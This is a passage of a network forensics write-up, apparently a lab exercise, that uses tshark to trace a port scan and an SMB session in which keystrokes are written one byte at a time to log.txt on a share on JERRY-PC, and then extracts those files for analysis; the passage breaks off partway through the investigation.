<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:8000 1 60 bytes 1 60 bytes 2 120 bytes 1.992774000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:990 1 60 bytes 1 60 bytes 2 120 bytes 1.992920000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:119 1 60 bytes 1 60 bytes 2 120 bytes 1.993156000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5000 1 60 bytes 1 60 bytes 2 120 bytes 1.993334000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:6646 1 60 bytes 1 60 bytes 2 120 bytes 1.993476000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:1026 1 60 bytes 1 60 bytes 2 120 bytes 1.993644000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:32768 1 60 bytes 1 60 bytes 2 120 bytes 1.993823000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:49154 1 60 bytes 1 60 bytes 2 120 bytes 1.993909000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:1900 1 60 bytes 1 60 bytes 2 120 bytes 1.994024000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:3128 1 60 bytes 1 60 bytes 2 120 bytes 1.994155000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5800 1 60 bytes 1 60 bytes 2 120 bytes 1.994324000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:7070 1 60 bytes 1 60 bytes 2 120 bytes 1.994457000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:544 1 60 bytes 1 60 bytes 2 120 bytes 1.994629000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5101 1 60 bytes 1 60 bytes 2 120 bytes 1.994841000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:548 1 60 bytes 1 60 bytes 2 120 bytes 1.994962000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:1029 1 60 bytes 1 60 bytes 2 120 bytes 1.995248000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:9100 1 60 bytes 1 60 bytes 2 120 bytes 1.995410000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5432 1 60 bytes 1 60 bytes 2 120 bytes 1.995574000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:26 1 60 bytes 1 60 bytes 2 120 bytes 1.995694000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:10000 1 60 bytes 1 60 bytes 2 120 bytes 1.995838000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:81 1 60 bytes 1 60 bytes 2 120 bytes 1.995984000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:389 1 60 bytes 1 60 bytes 2 120 bytes 1.996095000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:515 1 60 bytes 1 60 bytes 2 120 bytes 1.996281000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:8009 1 60 bytes 1 60 bytes 2 120 bytes 1.996376000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:9999 1 60 bytes 1 60 bytes 2 120 bytes 1.996896000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:1755 1 60 bytes 1 60 bytes 2 120 bytes 2.015660000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:631 1 60 bytes 1 60 bytes 2 120 bytes 2.015826000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:514 1 60 bytes 1 60 bytes 2 120 bytes 2.015934000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5060 1 60 bytes 1 60 bytes 2 120 bytes 2.016081000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:8081 1 60 bytes 1 60 bytes 2 120 bytes 2.016204000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:2001 1 60 bytes 1 60 bytes 2 120 bytes 2.016340000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:6001 1 60 bytes 1 60 bytes 2 120 bytes 2.016520000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:9 1 60 bytes 1 60 bytes 2 120 bytes 2.016648000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:144 1 60 bytes 1 60 bytes 2 120 bytes 2.016830000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:1433 1 60 bytes 1 60 bytes 2 120 bytes 2.017082000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:465 1 60 bytes 1 60 bytes 2 120 bytes 2.017231000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:543 1 60 bytes 1 60 bytes 2 120 bytes 2.017384000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:3000 1 60 bytes 1 60 bytes 2 120 bytes 2.017494000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:873 1 60 bytes 1 60 bytes 2 120 bytes 2.017645000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:1027 1 60 bytes 1 60 bytes 2 120 bytes 2.017752000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:49155 1 60 bytes 1 60 bytes 2 120 bytes 2.017935000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:49157 1 60 bytes 1 60 bytes 2 120 bytes 2.018088000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:646 1 60 bytes 1 60 bytes 2 120 bytes 2.018236000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:2717 1 60 bytes 1 60 bytes 2 120 bytes 2.018423000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:6000 1 60 bytes 1 60 bytes 2 120 bytes 2.018545000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5666 1 60 bytes 1 60 bytes 2 120 bytes 2.018685000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:79 1 60 bytes 1 60 bytes 2 120 bytes 2.018788000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:13 1 60 bytes 1 60 bytes 2 120 bytes 2.019002000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:49152 1 60 bytes 1 60 bytes 2 120 bytes 2.019137000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5190 1 60 bytes 1 60 bytes 2 120 bytes 2.019263000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:1028 1 60 bytes 1 60 bytes 2 120 bytes 2.031115000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:49153 1 60 bytes 1 60 bytes 2 120 bytes 2.031253000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:8008 1 60 bytes 1 60 bytes 2 120 bytes 2.031431000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5051 1 60 bytes 1 60 bytes 2 120 bytes 2.031644000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:513 1 60 bytes 1 60 bytes 2 120 bytes 2.031784000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5357 1 60 bytes 1 60 bytes 2 120 bytes 2.031926000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:444 1 60 bytes 1 60 bytes 2 120 bytes 2.032042000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:8443 1 60 bytes 1 60 bytes 2 120 bytes 2.032208000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:7 1 60 bytes 1 60 bytes 2 120 bytes 2.032387000 0.0002</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:427 1 60 bytes 1 60 bytes 2 120 bytes 2.032541000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5009 1 60 bytes 1 60 bytes 2 120 bytes 2.032698000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:106 1 60 bytes 1 60 bytes 2 120 bytes 2.032788000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5631 1 60 bytes 1 60 bytes 2 120 bytes 2.033075000 0.0002</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:2000 1 60 bytes 1 60 bytes 2 120 bytes 2.033376000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:3986 1 60 bytes 1 60 bytes 2 120 bytes 2.033584000 0.0001</span>
<span style="color: white;">10.240.240.5:44895 <-> 10.240.240.4:49156 1 60 bytes 1 60 bytes 2 120 bytes 3.114845000 0.0001</span>
<span style="color: white;">10.240.240.5:44895 <-> 10.240.240.4:2121 1 60 bytes 1 60 bytes 2 120 bytes 3.114957000 0.0000</span>
<span style="color: white;">10.240.240.5:63129 <-> 10.240.240.4:135 1 60 bytes 1 74 bytes 2 134 bytes 15.014570000 0.0001</span>
<span style="color: white;">10.240.240.5:63130 <-> 10.240.240.4:135 1 60 bytes 1 74 bytes 2 134 bytes 15.049537000 0.0003</span>
<span style="color: white;">10.240.240.5:63131 <-> 10.240.240.4:135 1 60 bytes 1 74 bytes 2 134 bytes 15.086134000 0.0001</span>
<span style="color: white;">10.240.240.5:63132 <-> 10.240.240.4:7 1 60 bytes 1 74 bytes 2 134 bytes 15.124352000 0.0003</span>
<span style="color: white;">10.240.240.5:63133 <-> 10.240.240.4:7 1 60 bytes 1 74 bytes 2 134 bytes 15.156202000 0.0002</span>
<span style="color: white;">10.240.240.5:63134 <-> 10.240.240.4:7 1 60 bytes 1 74 bytes 2 134 bytes 15.189820000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:2121 0 0 bytes 1 60 bytes 1 60 bytes 1.996564000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:49156 0 0 bytes 1 60 bytes 1 60 bytes 1.996745000 0.0000</span>
<span style="color: white;">================================================================================</span>
</pre></div>
</div><div><br /></div><div>If we look above, we see a number of records with frame count of 1 and byte count as 60. We can also see, this scanning activity is originating from the host at 10.240.240.5. This correlates with the findings of the logs (see log analysis section) on <i>NEWMAN-PC (10.240.240.5) </i>where <i>nmap.exe </i>was run.</div><div><br /></div><div>From above, the sessions of immediate importance are:</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">10.240.240.4:49674 <-> 10.240.240.5:445 360 63 kB 466 67 kB 826 130 kB 76.244037000 542.9534</span>
<span style="color: white;">10.240.240.5:49704 <-> 10.240.240.4:5985 378 338 kB 390 221 kB 768 559 kB 182.473326000 429.0919</span>
<span style="color: white;">10.240.240.5:49706 <-> 10.240.240.4:5985 216 128 kB 479 418 kB 695 547 kB 182.937975000 444.0836</span>
<span style="color: white;">10.240.240.5:49705 <-> 10.240.240.4:5985 182 110 kB 402 356 kB 584 467 kB 182.860278000 428.7639</span>
</pre></div>
</div><div><br /></div><div><div>Starting with session 10.240.240.4:49674 <-> 10.240.240.5:445. The communication between 10.240.240.4:49674 <-> 10.240.240.5:445 started on July 23, 2023 at 19:11:18 local time.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -r 5-4.pcap -Y '(ip.addr== 10.240.240.4) && (tcp.port==49674) && (ip.addr==10.240.240.5) && (tcp.port==445)' -t ad</span>
<span style="color: white;"> 306 </span><span style="color: #fcff01;"><b>2023-07-23 19:11:18.591093</b></span><span style="color: white;"> 10.240.240.4 → 10.240.240.5 TCP 66 49674 → 445 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM</span>
</pre></div>
</div><div><br /></div><div><div>For time in UTC, the activity started at 23:11 on July 23, 2023.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -r 5-4.pcap -Y '(ip.addr== 10.240.240.4) && (tcp.port==49674) && (ip.addr==10.240.240.5) && (tcp.port==445)' -t ud | more</span>
<span><span style="color: white;"> 306 </span><b><span style="color: #fcff01;">2023-07-23 23:11:18.591093</span></b><span style="color: white;"> 10.240.240.4 → 10.240.240.5 TCP 66 49674 → 445 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM</span></span>
</pre></div>
</div><div><br /></div><div><div>The username used to setup the SMB connection was <i>Newman.</i></div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;"> 314 2023-07-23 23:11:18.703795 10.240.240.4 → 10.240.240.5 SMB2 615 Session Setup Request, NTLMSSP_AUTH, </span><b><span style="color: #fcff01;">User: .\Newman</span></b></span>
<span style="color: white;"> 315 2023-07-23 23:11:18.707464 10.240.240.5 → 10.240.240.4 SMB2 159 Session Setup Response</span>
</pre></div>
</div><div><br /></div><div><div>Digging deeper into this session setup, we see <i>Newman</i> is logging on to <i>JERRY-PC</i> with username <i>Newman</i>. Why is Newman logging on to Jerry PC.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -r 5-4.pcap -Y 'frame.number==314' -V | sed '1,197d;214,$d' </span>
<span style="color: white;"> Domain name: .</span>
<span style="color: white;"> Length: 2</span>
<span style="color: white;"> Maxlen: 2</span>
<span style="color: white;"> Offset: 88</span>
<b><span style="color: #fcff01;"><span> User name: Newman</span>
</span></b><span style="color: white;"> Length: 12</span>
<span style="color: white;"> Maxlen: 12</span>
<span style="color: white;"> Offset: 90</span>
<span style="color: #fcff01;"><b><span> Host name: JERRY-PC</span>
</b></span><span style="color: white;"> Length: 16</span>
<span style="color: white;"> Maxlen: 16</span>
<span style="color: white;"> Offset: 102</span>
<span style="color: white;"> Session Key: fb1a311939e9582ea96066eae0c99946</span>
<span style="color: white;"> Length: 16</span>
<span style="color: white;"> Maxlen: 16</span>
<span style="color: white;"> Offset: 412</span>
</pre></div>
</div><div><br /></div><div><div>Stepping back to take a closer look into this frame.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -r 5-4.pcap -Y 'frame.number==314' -V | sed '1,157d;174,$d' </span>
<span><span style="color: white;"> Attribute: </span><b><span style="color: #fcff01;">NetBIOS </span></b><b><span style="color: #fcff01;">domain name: </span></b><b><span style="color: #fcff01;">NEWMAN-PC</span></b></span>
<span style="color: white;"> NTLMV2 Response Item Type: NetBIOS domain name (0x0002)</span>
<span style="color: white;"> NTLMV2 Response Item Length: 18</span>
<span style="color: white;"> NetBIOS Domain Name: NEWMAN-PC</span>
<span><span style="color: white;"> Attribute: </span><span style="color: #fcff01;"><b>NetBIOS computer name:</b></span><b><span style="color: #fcff01;"> NEWMAN-PC</span></b></span>
<span style="color: white;"> NTLMV2 Response Item Type: NetBIOS computer name (0x0001)</span>
<span style="color: white;"> NTLMV2 Response Item Length: 18</span>
<span style="color: white;"> NetBIOS Computer Name: NEWMAN-PC</span>
<span><span style="color: white;"> Attribute: </span><span style="color: #fcff01;"><b>DNS </b><b>domain name:</b> </span><b><span style="color: #fcff01;">Newman-PC</span></b></span>
<span style="color: white;"> NTLMV2 Response Item Type: DNS domain name (0x0004)</span>
<span style="color: white;"> NTLMV2 Response Item Length: 18</span>
<span style="color: white;"> DNS Domain Name: Newman-PC</span>
<span><span style="color: white;"> Attribute: </span><b><span style="color: #fcff01;">DNS computer name: Newman-PC</span></b></span>
<span style="color: white;"> NTLMV2 Response Item Type: DNS computer name (0x0003)</span>
<span style="color: white;"> NTLMV2 Response Item Length: 18</span>
<span style="color: white;"> DNS Computer Name: Newman-PC</span>
</pre></div>
</div><div><br /></div><div><div>Above, we see <i>NEWMAN-PC</i> for the <i>NetBios domain name</i>, the <i>Netbios computer name</i>, <i>DNS domain name </i>and <i>DNS Computer name</i>. This suggests this computer belongs to <i>Newman</i>. Newman seems to be using his credentials to connect to <i>Jerry-PC. </i>All of this is also confirmed via the log analysis further below.</div><div><br /></div><div>When we look into frame 315 (the response to 314), we see that a <i>Session Id</i> was assigned to Newman on host <i>JERRY-PC</i>.</div><div> <!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -r 5-4.pcap -Y 'frame.number==315' -V | sed '1,106d;115,$d'</span></pre><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;"> </span><b><span style="color: #fcff01;">Session Id: 0x0001040000000001 Acct:Newman Domain:. Host:JERRY-PC</span></b></span>
<span style="color: white;"> [</span><span style="color: #fcff01;"><b>Account: Newman</b></span><span style="color: white;">]</span>
<span style="color: white;"> [Domain: .]</span>
<span><span style="color: white;"> [</span><b><span style="color: #fcff01;">Host: JERRY-PC</span></b><span style="color: white;">]</span></span>
<span style="color: white;"> [Authenticated in Frame: 314]</span>
<span style="color: white;"> Signature: f161357be0ca6801f8a6ab45a8a37943</span>
<span style="color: white;"> [Response to: 314]</span>
<span style="color: white;"> [Time from request: 0.003669000 seconds]</span>
</pre></div>
</div><div><br /></div><div><div>We then see a request to connect to the share <i>\\10.240.240.5\Shared</i> from <i>10.240.240.4</i>. This request was successful.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> 316 2023-07-23 23:11:18.726884 10.240.240.4 → 10.240.240.5 SMB2 172 Tree Connect Request Tree: </span><span style="color: #fcff01;"><b>\\10.240.240.5\Shared</b></span>
<span style="color: white;"> 317 2023-07-23 23:11:18.728119 10.240.240.5 → 10.240.240.4 SMB2 138 Tree Connect Response</span>
</pre></div>
</div><div><br /></div><div><div>We then see a request to create a file named <i>log.txt</i>. This response seemed to have been successful</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;"> 318 2023-07-23 23:11:18.763385 10.240.240.4 → 10.240.240.5 SMB2 192 </span><b><span style="color: #fcff01;">Create Request File: log.txt</span></b></span>
<span><span style="color: white;"> 319 2023-07-23 23:11:18.764399 10.240.240.5 → 10.240.240.4 SMB2 210 </span><b><span style="color: #fcff01;">Create Response File: log.txt</span></b></span>
</pre></div>
</div><div><br /></div><div><div>After creating the <i>log.txt</i>, we see about 1 byte is written to the file.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;"> 320 2023-07-23 23:11:18.790806 10.240.240.4 → 10.240.240.5 SMB2 171</span><b><span style="color: #fcff01;"> Write Request Len:1 Off:1000 File: log.txt</span></b></span>
<span style="color: white;"> 321 2023-07-23 23:11:18.791670 10.240.240.5 → 10.240.240.4 SMB2 138 Write Response</span>
</pre></div>
</div><div><br /></div><div><div>The file is then closed.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> 322 2023-07-23 23:11:18.796259 10.240.240.4 → 10.240.240.5 SMB2 146 </span><span style="color: #fcff01;"><b>Close Request File: log.txt</b></span>
<span style="color: white;"> 323 2023-07-23 23:11:18.796697 10.240.240.5 → 10.240.240.4 SMB2 182 Close Response</span>
</pre></div>
</div><div><br /></div><div><div>This process of creating the file and writing 1 byte and closing continued until the session starts reporting Keep-Alive ack messages.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;"> 1119 2023-07-23 23:12:21.454723 10.240.240.4 → 10.240.240.5 SMB2 192 </span><b><span style="color: #fcff01;">Create Request File: log.txt</span></b></span>
<span><span style="color: white;"> 1120 2023-07-23 23:12:21.455367 10.240.240.5 → 10.240.240.4 SMB2 210 </span><b><span style="color: #fcff01;">Create Response File: log.txt</span></b></span>
<span style="color: white;"> 1121 2023-07-23 23:12:21.456480 10.240.240.4 → 10.240.240.5 SMB2 171 </span><span style="color: #fcff01;"><b>Write Request Len:1 Off:1290 File: log.txt</b></span>
<span><span style="color: white;"> 1122 2023-07-23 23:12:21.456752 10.240.240.5 → 10.240.240.4 SMB2 138 </span><b><span style="color: #fcff01;">Write Response</span></b></span>
<span><span style="color: white;"> 1123 2023-07-23 23:12:21.457468 10.240.240.4 → 10.240.240.5 SMB2 146 </span><b><span style="color: #fcff01;">Close Request File: log.txt</span></b></span>
<span><span style="color: white;"> 1124 2023-07-23 23:12:21.457660 10.240.240.5 → 10.240.240.4 SMB2 182 </span><b><span style="color: #fcff01;">Close Response</span></b></span>
</pre></div>
</div><div><br /></div><div><div>At this point above, we see 1 byte is still written but the file is now at offset 1290.It stared off at offset 1000. This means the file should now contain atleast 1290-1000 = 290 bytes. My conclusion at this point, it seems like a keylogger was in use. I see no other reason why one byte would be written at a time.</div><div><br /></div><div>Writing this session out to a file of it's own.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -r 5-4.pcap -Y '(ip.addr== 10.240.240.4) && (tcp.port==49674) && (ip.addr==10.240.240.5) && (tcp.port==445)' -w 4_49674-5_445.pcap</span>
</pre></div>
</div><div><br /></div><div><div>With the new file created, confirming the share accessed and the file created in this share.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 4_49674-5_445.pcap -T fields -e smb2.tree -e smb2.filename | sort | uniq --count</span>
<span style="color: white;"> 123 </span>
<span style="color: white;"> 586 \\10.240.240.5\Shared</span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">117 \\10.240.240.5\Shared log.txt</span></b></span>
</pre></div>
</div><div><br /></div><div><div>We see that there were 117 instances of the <i>log.txt</i> file appearance in this session. If we step back above, I stated it looks like about 290 bytes were written. However, if we look here and see 117 times this file was seen and we know 1 byte was written each time, does this mean the file actually contains 117 bytes or somewhere there? These are all things for us to validate during this investigation.</div><div><br /></div><div>Preparing to extract the<i> log.txt</i> files by first making a directory named "<i>extracted_content</i>" then changing to that directory to store the extracted contents.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ mkdir extracted_content && cd extracted_content</span>
</pre></div>
</div><div><br /></div><div><div>Fortunately, TShark (and Wireshark) can extract contents from protocols such as SMB.</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">$ tshark.exe --export-objects --help
tshark: "--export-objects" are specified as: <protocol>,<destdir>
tshark: The available export object types for the "--export-objects" option are:
dicom
ftp-data
http
imf
smb
tftp</span>
</pre></div></div><div><br /></div></div><div>Extracting the <i>log.txt</i> files:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r ../4_49674-5_445.pcap --export-objects smb,. -</span>
</pre></div>
</div><div><br /></div><div><div>Looks like 118 files were extracted. My gosh, why all of these discrepancies.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ ls -l | wc --lines</span>
<span style="color: white;">118</span>
</pre></div>
</div><div><br /></div><div><div>Taking a quick look at the files.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ ls -l *</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 1265 Jul 26 10:12 '%5clog(100).txt'</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 1266 Jul 26 10:12 '%5clog(101).txt'</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 1267 Jul 26 10:12 '%5clog(102).txt'</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 1268 Jul 26 10:12 '%5clog(103).txt'</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 1279 Jul 26 10:12 '%5clog(104).txt'</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 1280 Jul 26 10:12 '%5clog(105).txt'</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 1281 Jul 26 10:12 '%5clog(106).txt'</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 1282 Jul 26 10:12 '%5clog(107).txt'</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>Reading one of the files</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ cat "%5clog(100).txt"</span>
<span style="color: white;">c</span>
</pre></div>
</div><div><br /></div><div><div>As expected. One character at time. Now do I need to read each of these files individually to see what is in all of them. I don't intend to :-)</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ cat * | tr --complement --delete [:print:]</span>
</pre></div>
